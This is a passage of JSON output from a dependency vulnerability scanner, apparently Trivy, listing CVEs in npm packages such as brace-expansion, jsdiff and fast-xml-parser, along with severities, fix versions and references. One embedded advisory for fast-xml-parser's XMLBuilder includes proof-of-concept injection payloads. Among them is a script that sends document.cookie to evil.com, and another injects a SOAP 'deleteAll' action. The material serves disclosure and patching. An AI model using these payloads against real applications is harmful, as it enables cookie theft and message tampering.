"Severity": "MEDIUM", "CweIDs": [ "CWE-113", "CWE-444", "CWE-918" ], "VendorSeverity": { "ghsa": 2, "nvd": 2, "redhat": 3 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N", "V3Score": 4.8 }, "nvd": { "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N", "V3Score": 4.8 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "V3Score": 9 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-40175", "https://github.com/axios/axios", "https://github.com/axios/axios/commit/03cdfc99e8db32a390e12128208b6778492cee9c", "https://github.com/axios/axios/commit/363185461b90b1b78845dc8a99a1f103d9b122a1", "https://github.com/axios/axios/pull/10660", "https://github.com/axios/axios/pull/10660#issuecomment-4224168081", "https://github.com/axios/axios/pull/10688", "https://github.com/axios/axios/releases/tag/v0.31.0", "https://github.com/axios/axios/releases/tag/v1.15.0", "https://github.com/axios/axios/security/advisories/GHSA-fvcv-3m26-pcqx", "https://nvd.nist.gov/vuln/detail/CVE-2026-40175", "https://www.cve.org/CVERecord?id=CVE-2026-40175" ], "PublishedDate": "2026-04-10T20:16:22.8Z", "LastModifiedDate": "2026-04-21T19:44:44.4Z" }, { "VulnerabilityID": "CVE-2026-33750", "VendorIDs": [ "GHSA-f886-m6hf-6m8v" ], "PkgID": "brace-expansion@1.1.12", "PkgName": "brace-expansion", "PkgIdentifier": { "PURL": "pkg:npm/brace-expansion@1.1.12", "UID": "972621d048eefceb" }, "InstalledVersion": "1.1.12", "FixedVersion": "5.0.5, 3.0.2, 2.0.3, 1.1.13", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-33750", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:9c9472b7934f8f576906b77193dace3fe0256dbe686ede071b93fdb4ad2ee5c2", "Title": "brace-expansion: brace-expansion: Denial of Service via zero step value in brace pattern", "Description": "The brace-expansion library generates arbitrary strings containing a common prefix and suffix. Prior to versions 5.0.5, 3.0.2, 2.0.3, and 1.1.13, a brace pattern with a zero step value (e.g., `{1..2..0}`) causes the sequence generation loop to run indefinitely, making the process hang for seconds and allocate heaps of memory. Versions 5.0.5, 3.0.2, 2.0.3, and 1.1.13 fix the issue. As a workaround, sanitize strings passed to `expand()` to ensure a step value of `0` is not used.", "Severity": "MEDIUM", "CweIDs": [ "CWE-400" ], "VendorSeverity": { "ghsa": 2, "nvd": 3, "redhat": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "V3Score": 6.5 }, "nvd": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "V3Score": 6.5 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-33750", "https://github.com/juliangruber/brace-expansion", "https://github.com/juliangruber/brace-expansion/blob/daa71bcb4a30a2df9bcb7f7b8daaf2ab30e5794a/src/index.ts#L107-L113", "https://github.com/juliangruber/brace-expansion/blob/daa71bcb4a30a2df9bcb7f7b8daaf2ab30e5794a/src/index.ts#L184", "https://github.com/juliangruber/brace-expansion/commit/311ac0d54994158c0a384e286a7d6cbb17ee8ed5", "https://github.com/juliangruber/brace-expansion/commit/7fd684f89fdde3549563d0a6522226a9189472a2", "https://github.com/juliangruber/brace-expansion/commit/b9cacd9e55e7a1fa588fe4b7bb1159d52f1d902a", "https://github.com/juliangruber/brace-expansion/issues/98", "https://github.com/juliangruber/brace-expansion/pull/95", "https://github.com/juliangruber/brace-expansion/pull/96", "https://github.com/juliangruber/brace-expansion/pull/97", "https://github.com/juliangruber/brace-expansion/security/advisories/GHSA-f886-m6hf-6m8v", "https://nvd.nist.gov/vuln/detail/CVE-2026-33750", "https://www.cve.org/CVERecord?id=CVE-2026-33750" ], "PublishedDate": "2026-03-27T15:16:57.297Z", "LastModifiedDate": "2026-04-22T14:23:19.11Z" }, { "VulnerabilityID": "CVE-2026-33750", "VendorIDs": [ "GHSA-f886-m6hf-6m8v" ], "PkgID": "brace-expansion@2.0.2", "PkgName": "brace-expansion", "PkgIdentifier": { "PURL": "pkg:npm/brace-expansion@2.0.2", "UID": "5e453dd69b965804" }, "InstalledVersion": "2.0.2", "FixedVersion": "5.0.5, 3.0.2, 2.0.3, 1.1.13", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-33750", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:c0a989eb4ea3c4c02a0c85e01dd67c208353643fa59c15ee1a42ec745570a7fc", "Title": "brace-expansion: brace-expansion: Denial of Service via zero step value in brace pattern", "Description": "The brace-expansion library generates arbitrary strings containing a common prefix and suffix. Prior to versions 5.0.5, 3.0.2, 2.0.3, and 1.1.13, a brace pattern with a zero step value (e.g., `{1..2..0}`) causes the sequence generation loop to run indefinitely, making the process hang for seconds and allocate heaps of memory. Versions 5.0.5, 3.0.2, 2.0.3, and 1.1.13 fix the issue. As a workaround, sanitize strings passed to `expand()` to ensure a step value of `0` is not used.", "Severity": "MEDIUM", "CweIDs": [ "CWE-400" ], "VendorSeverity": { "ghsa": 2, "nvd": 3, "redhat": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "V3Score": 6.5 }, "nvd": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "V3Score": 6.5 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-33750", "https://github.com/juliangruber/brace-expansion", "https://github.com/juliangruber/brace-expansion/blob/daa71bcb4a30a2df9bcb7f7b8daaf2ab30e5794a/src/index.ts#L107-L113", "https://github.com/juliangruber/brace-expansion/blob/daa71bcb4a30a2df9bcb7f7b8daaf2ab30e5794a/src/index.ts#L184", "https://github.com/juliangruber/brace-expansion/commit/311ac0d54994158c0a384e286a7d6cbb17ee8ed5", "https://github.com/juliangruber/brace-expansion/commit/7fd684f89fdde3549563d0a6522226a9189472a2", "https://github.com/juliangruber/brace-expansion/commit/b9cacd9e55e7a1fa588fe4b7bb1159d52f1d902a", "https://github.com/juliangruber/brace-expansion/issues/98", "https://github.com/juliangruber/brace-expansion/pull/95", "https://github.com/juliangruber/brace-expansion/pull/96", "https://github.com/juliangruber/brace-expansion/pull/97", "https://github.com/juliangruber/brace-expansion/security/advisories/GHSA-f886-m6hf-6m8v", "https://nvd.nist.gov/vuln/detail/CVE-2026-33750", "https://www.cve.org/CVERecord?id=CVE-2026-33750" ], "PublishedDate": "2026-03-27T15:16:57.297Z", "LastModifiedDate": "2026-04-22T14:23:19.11Z" }, { "VulnerabilityID": "CVE-2026-24001", "VendorIDs": [ "GHSA-73rr-hh4g-fpgx" ], "PkgID": "diff@8.0.2", "PkgName": "diff", "PkgIdentifier": { "PURL": "pkg:npm/diff@8.0.2", "UID": "e499c88b2fc9c33d" }, "InstalledVersion": "8.0.2", "FixedVersion": "8.0.3, 5.2.2, 4.0.4, 3.5.1", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-24001", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:bd8d26db7fa858b4f3718adfddcd5954c410d55257125ef4145c96dbe0d68dce", "Title": "jsdiff: denial of service vulnerability in parsePatch and applyPatch", "Description": "jsdiff is a JavaScript text differencing implementation. Prior to versions 8.0.3, 5.2.2, 4.0.4, and 3.5.1, attempting to parse a patch whose filename headers contain the line break characters `\\r`, `\\u2028`, or `\\u2029` can cause the `parsePatch` method to enter an infinite loop. It then consumes memory without limit until the process crashes due to running out of memory. Applications are therefore likely to be vulnerable to a denial-of-service attack if they call `parsePatch` with a user-provided patch as input. A large payload is not needed to trigger the vulnerability, so size limits on user input do not provide any protection. Furthermore, some applications may be vulnerable even when calling `parsePatch` on a patch generated by the application itself if the user is nonetheless able to control the filename headers (e.g. by directly providing the filenames of the files to be diffed). The `applyPatch` method is similarly affected if (and only if) called with a string representation of a patch as an argument, since under the hood it parses that string using `parsePatch`. Other methods of the library are unaffected. Finally, a second and lesser interdependent bug - a ReDOS - also exhibits when those same line break characters are present in a patch's *patch* header (also known as its \"leading garbage\"). A maliciously-crafted patch header of length *n* can take `parsePatch` O(*n*³) time to parse. Versions 8.0.3, 5.2.2, 4.0.4, and 3.5.1 contain a fix. As a workaround, do not attempt to parse patches that contain any of these characters: `\\r`, `\\u2028`, or `\\u2029`.", "Severity": "LOW", "CweIDs": [ "CWE-400", "CWE-1333" ], "VendorSeverity": { "ghsa": 1, "nvd": 3, "redhat": 3 }, "CVSS": { "ghsa": { "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U", "V40Score": 2.7 }, "nvd": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-24001", "https://github.com/kpdecker/jsdiff", "https://github.com/kpdecker/jsdiff/commit/15a1585230748c8ae6f8274c202e0c87309142f5", "https://github.com/kpdecker/jsdiff/issues/653", "https://github.com/kpdecker/jsdiff/pull/649", "https://github.com/kpdecker/jsdiff/security/advisories/GHSA-73rr-hh4g-fpgx", "https://nvd.nist.gov/vuln/detail/CVE-2026-24001", "https://www.cve.org/CVERecord?id=CVE-2026-24001" ], "PublishedDate": "2026-01-22T03:15:47.627Z", "LastModifiedDate": "2026-03-04T15:23:41.347Z" }, { "VulnerabilityID": "CVE-2026-25896", "VendorIDs": [ "GHSA-m7jm-9gc2-mpf2" ], "PkgID": "fast-xml-parser@4.5.3", "PkgName": "fast-xml-parser", "PkgIdentifier": { "PURL": "pkg:npm/fast-xml-parser@4.5.3", "UID": "590ac80883be18cd" }, "InstalledVersion": "4.5.3", "FixedVersion": "5.3.5, 4.5.4", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-25896", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:46724e0d9d1e128a1657f1ed7e1e2f56ef571dfcea5517f52cecc369ce5652cf", "Title": "fast-xml-parser: fast-xml-parser: Cross-Site Scripting (XSS) due to improper DOCTYPE entity handling", "Description": "fast-xml-parser allows users to validate XML, parse XML to JS object, or build XML from JS object without C/C++ based libraries and no callback. From 4.1.3to before 5.3.5, a dot (.) in a DOCTYPE entity name is treated as a regex wildcard during entity replacement, allowing an attacker to shadow built-in XML entities (\u0026lt;, \u0026gt;, \u0026amp;, \u0026quot;, \u0026apos;) with arbitrary values. This bypasses entity encoding and leads to XSS when parsed output is rendered. This vulnerability is fixed in 5.3.5.", "Severity": "CRITICAL", "CweIDs": [ "CWE-185" ], "VendorSeverity": { "ghsa": 4, "redhat": 3 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:N", "V3Score": 9.3 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "V3Score": 7.1 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-25896", "https://github.com/NaturalIntelligence/fast-xml-parser", "https://github.com/NaturalIntelligence/fast-xml-parser/commit/943ef0eb1b2d3284e72dd74f44a042ee9f07026e", "https://github.com/NaturalIntelligence/fast-xml-parser/commit/ddcd0acf26ddd682cb0dc15a2bd6aa3b96bb1e69", "https://github.com/NaturalIntelligence/fast-xml-parser/releases/tag/v5.3.5", "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-m7jm-9gc2-mpf2", "https://nvd.nist.gov/vuln/detail/CVE-2026-25896", "https://www.cve.org/CVERecord?id=CVE-2026-25896" ], "PublishedDate": "2026-02-20T21:19:27.47Z", "LastModifiedDate": "2026-03-02T14:54:02.76Z" }, { "VulnerabilityID": "CVE-2026-26278", "VendorIDs": [ "GHSA-jmr7-xgp7-cmfj" ], "PkgID": "fast-xml-parser@4.5.3", "PkgName": "fast-xml-parser", "PkgIdentifier": { "PURL": "pkg:npm/fast-xml-parser@4.5.3", "UID": "590ac80883be18cd" }, "InstalledVersion": "4.5.3", "FixedVersion": "4.5.4, 5.3.6", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-26278", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:fcf35535c10bb09627b13cde44f95bbf9eb44f7652f50dfda78b3f51128fb7ee", "Title": "fast-xml-parser: fast-xml-parser: Denial of Service via unlimited XML entity expansion", "Description": "fast-xml-parser allows users to validate XML, parse XML to JS object, or build XML from JS object without C/C++ based libraries and no callback. In versions 4.1.3 through 5.3.5, the XML parser can be forced to do an unlimited amount of entity expansion. With a very small XML input, it’s possible to make the parser spend seconds or even minutes processing a single request, effectively freezing the application. Version 5.3.6 fixes the issue. As a workaround, avoid using DOCTYPE parsing by `processEntities: false` option.", "Severity": "HIGH", "CweIDs": [ "CWE-776" ], "VendorSeverity": { "ghsa": 3, "redhat": 3 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-26278", "https://github.com/NaturalIntelligence/fast-xml-parser", "https://github.com/NaturalIntelligence/fast-xml-parser/commit/910dae5be2de2955e968558fadf6e8f74f117a77", "https://github.com/NaturalIntelligence/fast-xml-parser/releases/tag/v5.3.6", "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-jmr7-xgp7-cmfj", "https://nvd.nist.gov/vuln/detail/CVE-2026-26278", "https://www.cve.org/CVERecord?id=CVE-2026-26278" ], "PublishedDate": "2026-02-19T20:25:43.717Z", "LastModifiedDate": "2026-02-23T19:30:26.017Z" }, { "VulnerabilityID": "CVE-2026-33036", "VendorIDs": [ "GHSA-8gc5-j5rx-235r" ], "PkgID": "fast-xml-parser@4.5.3", "PkgName": "fast-xml-parser", "PkgIdentifier": { "PURL": "pkg:npm/fast-xml-parser@4.5.3", "UID": "590ac80883be18cd" }, "InstalledVersion": "4.5.3", "FixedVersion": "5.5.6, 4.5.5", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-33036", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:73360d595f042824ee1ffe9755bc3d655041d4c5c997a9fef8d246bfec24f365", "Title": "fast-xml-parser: fast-xml-parser: Denial of Service via XML entity expansion bypass", "Description": "fast-xml-parser allows users to process XML from JS object without C/C++ based libraries or callbacks. Versions 4.0.0-beta.3 through 5.5.5 contain a bypass vulnerability where numeric character references (\u0026#NNN;, \u0026#xHH;) and standard XML entities completely evade the entity expansion limits (e.g., maxTotalExpansions, maxExpandedLength) added to fix CVE-2026-26278, enabling XML entity expansion Denial of Service. The root cause is that replaceEntitiesValue() in OrderedObjParser.js only enforces expansion counting on DOCTYPE-defined entities while the lastEntities loop handling numeric/standard entities performs no counting at all. An attacker supplying 1M numeric entity references like \u0026#65; can force ~147MB of memory allocation and heavy CPU usage, potentially crashing the process—even when developers have configured strict limits. This issue has been fixed in version 5.5.6.", "Severity": "HIGH", "CweIDs": [ "CWE-776" ], "VendorSeverity": { "ghsa": 3, "redhat": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-33036", "https://github.com/NaturalIntelligence/fast-xml-parser", "https://github.com/NaturalIntelligence/fast-xml-parser/commit/bd26122c838e6a55e7d7ac49b4ccc01a49999a01", "https://github.com/NaturalIntelligence/fast-xml-parser/releases/tag/v4.5.5", "https://github.com/NaturalIntelligence/fast-xml-parser/releases/tag/v5.5.6", "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-8gc5-j5rx-235r", "https://nvd.nist.gov/vuln/detail/CVE-2026-33036", "https://www.cve.org/CVERecord?id=CVE-2026-33036" ], "PublishedDate": "2026-03-20T06:16:11.63Z", "LastModifiedDate": "2026-03-23T16:28:10.93Z" }, { "VulnerabilityID": "CVE-2026-33349", "VendorIDs": [ "GHSA-jp2q-39xq-3w4g" ], "PkgID": "fast-xml-parser@4.5.3", "PkgName": "fast-xml-parser", "PkgIdentifier": { "PURL": "pkg:npm/fast-xml-parser@4.5.3", "UID": "590ac80883be18cd" }, "InstalledVersion": "4.5.3", "FixedVersion": "4.5.5, 5.5.7", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-33349", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:7552bbabb2a8717a1d9f8b92ae05d2c868581efbacfbc5b4c65392c379ef6a60", "Title": "fast-xml-parser: fast-xml-parser: Denial of Service via unbounded entity expansion due to incorrect configuration limit handling", "Description": "fast-xml-parser allows users to process XML from JS object without C/C++ based libraries or callbacks. From version 4.0.0-beta.3 to before version 5.5.7, the DocTypeReader in fast-xml-parser uses JavaScript truthy checks to evaluate maxEntityCount and maxEntitySize configuration limits. When a developer explicitly sets either limit to 0 — intending to disallow all entities or restrict entity size to zero bytes — the falsy nature of 0 in JavaScript causes the guard conditions to short-circuit, completely bypassing the limits. An attacker who can supply XML input to such an application can trigger unbounded entity expansion, leading to memory exhaustion and denial of service. This issue has been patched in version 5.5.7.", "Severity": "MEDIUM", "CweIDs": [ "CWE-1284" ], "VendorSeverity": { "ghsa": 2, "redhat": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 5.9 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 5.9 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-33349", "https://github.com/NaturalIntelligence/fast-xml-parser", "https://github.com/NaturalIntelligence/fast-xml-parser/commit/239b64aa1fc5c5455ddebbbb54a187eb68c9fdb7", "https://github.com/NaturalIntelligence/fast-xml-parser/commit/88d0936a23dabe51bfbf42255e2ce912dfee2221", "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-jp2q-39xq-3w4g", "https://nvd.nist.gov/vuln/detail/CVE-2026-33349", "https://www.cve.org/CVERecord?id=CVE-2026-33349" ], "PublishedDate": "2026-03-24T20:16:29.407Z", "LastModifiedDate": "2026-03-26T13:01:52.857Z" }, { "VulnerabilityID": "CVE-2026-41650", "VendorIDs": [ "GHSA-gh4j-gqv2-49f6" ], "PkgID": "fast-xml-parser@4.5.3", "PkgName": "fast-xml-parser", "PkgIdentifier": { "PURL": "pkg:npm/fast-xml-parser@4.5.3", "UID": "590ac80883be18cd" }, "InstalledVersion": "4.5.3", "FixedVersion": "5.7.0", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-41650", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:8886f8885da1664e9f7b587e5e31171d1e9189677fed68f442fa8bcbb2dc914d", "Title": "fast-xml-parser XMLBuilder: XML Comment and CDATA Injection via Unescaped Delimiters", "Description": "# fast-xml-parser XMLBuilder: Comment and CDATA Injection via Unescaped Delimiters\n\n## Summary\n\nfast-xml-parser XMLBuilder does not escape the `--\u003e` sequence in comment content or the `]]\u003e` sequence in CDATA sections when building XML from JavaScript objects. This allows XML injection when user-controlled data flows into comments or CDATA elements, leading to XSS, SOAP injection, or data manipulation.\n\nExisting CVEs for fast-xml-parser cover different issues:\n- CVE-2023-26920: Prototype pollution (parser)\n- CVE-2023-34104: ReDoS (parser)\n- CVE-2026-27942: Stack overflow in XMLBuilder with preserveOrder\n- CVE-2026-25896: Entity encoding bypass via regex in DOCTYPE entities\n\nThis finding covers **unescaped comment/CDATA delimiters in XMLBuilder** - a distinct vulnerability.\n\n## Vulnerable Code\n\n**File**: `src/fxb.js`\n\n```javascript\n// Line 442 - Comment building with NO escaping of --\u003e\nbuildTextValNode(val, key, attrStr, level) {\n // ...\n if (key === this.options.commentPropName) {\n return this.indentate(level) + `\u003c!--${val}--\u003e` + this.newLine; // VULNERABLE\n }\n // ...\n if (key === this.options.cdataPropName) {\n return this.indentate(level) + `\u003c![CDATA[${val}]]\u003e` + this.newLine; // VULNERABLE\n }\n}\n```\n\nCompare with attribute/text escaping which IS properly handled via `replaceEntitiesValue()`.\n\n## Proof of Concept\n\n### Test 1: Comment Injection (XSS in SVG/HTML context)\n\n```javascript\nimport { XMLBuilder } from 'fast-xml-parser';\n\nconst builder = new XMLBuilder({\n commentPropName: \"#comment\",\n format: true,\n suppressEmptyNode: true\n});\n\nconst xml = {\n root: {\n \"#comment\": \"--\u003e\u003cscript\u003ealert('XSS')\u003c/script\u003e\u003c!--\",\n data: \"legitimate content\"\n }\n};\n\nconsole.log(builder.build(xml));\n```\n\n**Output**:\n```xml\n\u003croot\u003e\n \u003c!----\u003e\u003cscript\u003ealert('XSS')\u003c/script\u003e\u003c!----\u003e\n \u003cdata\u003elegitimate content\u003c/data\u003e\n\u003c/root\u003e\n```\n\n### Test 2: CDATA Injection (RSS feed)\n\n```javascript\nconst builder = new XMLBuilder({\n cdataPropName: \"#cdata\",\n format: true,\n suppressEmptyNode: true\n});\n\nconst rss = {\n rss: { channel: { item: {\n title: \"Article\",\n description: {\n \"#cdata\": \"Content]]\u003e\u003cscript\u003efetch('https://evil.com/'+document.cookie)\u003c/script\u003e\u003c![CDATA[more\"\n }\n }}}\n};\n\nconsole.log(builder.build(rss));\n```\n\n**Output**:\n```xml\n\u003crss\u003e\n \u003cchannel\u003e\n \u003citem\u003e\n \u003ctitle\u003eArticle\u003c/title\u003e\n \u003cdescription\u003e\n \u003c![CDATA[Content]]\u003e\u003cscript\u003efetch('https://evil.com/'+document.cookie)\u003c/script\u003e\u003c![CDATA[more]]\u003e\n \u003c/description\u003e\n \u003c/item\u003e\n \u003c/channel\u003e\n\u003c/rss\u003e\n```\n\n### Test 3: SOAP Message Injection\n\n```javascript\nconst builder = new XMLBuilder({\n commentPropName: \"#comment\",\n format: true\n});\n\nconst soap = {\n \"soap:Envelope\": {\n \"soap:Body\": {\n \"#comment\": \"Request from user: --\u003e\u003csoap:Body\u003e\u003cAction\u003edeleteAll\u003c/Action\u003e\u003c/soap:Body\u003e\u003c!--\",\n Action: \"getBalance\",\n UserId: \"12345\"\n }\n }\n};\n\nconsole.log(builder.build(soap));\n```\n\n**Output**:\n```xml\n\u003csoap:Envelope\u003e\n \u003csoap:Body\u003e\n \u003c!--Request from user: --\u003e\u003csoap:Body\u003e\u003cAction\u003edeleteAll\u003c/Action\u003e\u003c/soap:Body\u003e\u003c!----\u003e\n \u003cAction\u003egetBalance\u003c/Action\u003e\n \u003cUserId\u003e12345\u003c/UserId\u003e\n \u003c/soap:Body\u003e\n\u003c/soap:Envelope\u003e\n```\n\nThe injected `\u003cAction\u003edeleteAll\u003c/Action\u003e` appears as a real SOAP action element.\n\n## Tested Output\n\nAll tests run on Node.js v22, fast-xml-parser v5.5.12:\n\n```\n1. COMMENT INJECTION:\n Injection successful: true\n\n2. CDATA INJECTION (RSS feed scenario):\n Injection successful: true\n\n4. Round-trip test:\n Injection present: true\n\n5. SOAP MESSAGE INJECTION:\n Contains injected Action: true\n```\n\n## Impact\n\nAn attacker who controls data that flows into XML comments or CDATA sections via XMLBuilder can:\n\n1. **XSS**: Inject `\u003cscript\u003e` tags into XML/SVG/HTML documents served to browsers\n2. **SOAP injection**: Modify SOAP message structure by injecting XML elements\n3. **RSS/Atom feed poisoning**: Inject scripts into RSS feed items via CDATA breakout\n4. **XML document manipulation**: Break XML structure by escaping comment/CDATA context\n\nThis is practically exploitable whenever applications use XMLBuilder to generate XML from data that includes user-controlled content in comments or CDATA (e.g., RSS feeds, SOAP services, SVG generation, config files).\n\n## Suggested Fix\n\nEscape delimiters in comment and CDATA content:\n\n```javascript\n// For comments: replace -- with escaped equivalent\nif (key === this.options.commentPropName) {\n const safeVal = String(val).replace(/--/g, '\u0026#45;\u0026#45;');\n return this.indentate(level) + `\u003c!--${safeVal}--\u003e` + this.newLine;\n}\n\n// For CDATA: split on ]]\u003e and rejoin with separate CDATA sections\nif (key === this.options.cdataPropName) {\n const safeVal = String(val).replace(/]]\u003e/g, ']]]]\u003e\u003c![CDATA[\u003e');\n return this.indentate(level) + `\u003c![CDATA[${safeVal}]]\u003e` + this.newLine;\n}\n```", "Severity": "MEDIUM", "VendorSeverity": { "ghsa": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "V3Score": 6.1 } }, "References": [ "https://github.com/NaturalIntelligence/fast-xml-parser", "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-gh4j-gqv2-49f6" ] }, { "VulnerabilityID": "CVE-2026-27942", "VendorIDs": [ "GHSA-fj3w-jwp8-x2g3" ], "PkgID": "fast-xml-parser@4.5.3", "PkgName": "fast-xml-parser", "PkgIdentifier": { "PURL": "pkg:npm/fast-xml-parser@4.5.3", "UID": "590ac80883be18cd" }, "InstalledVersion": "4.5.3", "FixedVersion": "5.3.8, 4.5.4", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-27942", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:9cf9d8a4e2256f2adaa1c9c51238562d980658f5c646b5259c236470c5d019f5", "Title": "fast-xml-parser: fast-xml-parser: Stack overflow leads to Denial of Service", "Description": "fast-xml-parser allows users to validate XML, parse XML to JS object, or build XML from JS object without C/C++ based libraries and no callback. Prior to version 5.3.8, the application crashes with stack overflow when user use XML builder with `preserveOrder:true`. Version 5.3.8 fixes the issue. As a workaround, use XML builder with `preserveOrder:false` or check the input data before passing to builder.", "Severity": "LOW", "CweIDs": [ "CWE-120" ], "VendorSeverity": { "ghsa": 1, "nvd": 3, "redhat": 2 }, "CVSS": { "ghsa": { "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U", "V40Score": 2.7 }, "nvd": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-27942", "https://github.com/NaturalIntelligence/fast-xml-parser", "https://github.com/NaturalIntelligence/fast-xml-parser/commit/c13a961910f14986295dd28484eee830fa1a0e8a", "https://github.com/NaturalIntelligence/fast-xml-parser/pull/791", "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-fj3w-jwp8-x2g3", "https://nvd.nist.gov/vuln/detail/CVE-2026-27942", "https://www.cve.org/CVERecord?id=CVE-2026-27942" ], "PublishedDate": "2026-02-26T02:16:22.357Z", "LastModifiedDate": "2026-03-02T14:54:48.08Z" }, { "VulnerabilityID": "GHSA-r4q5-vmmm-2653", "PkgID": "follow-redirects@1.15.11", "PkgName": "follow-redirects", "PkgIdentifier": { "PURL": "pkg:npm/follow-redirects@1.15.11", "UID": "6524ae70e09c9077" }, "InstalledVersion": "1.15.11", "FixedVersion": "1.16.0", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://github.com/advisories/GHSA-r4q5-vmmm-2653", "DataSource": { "ID": 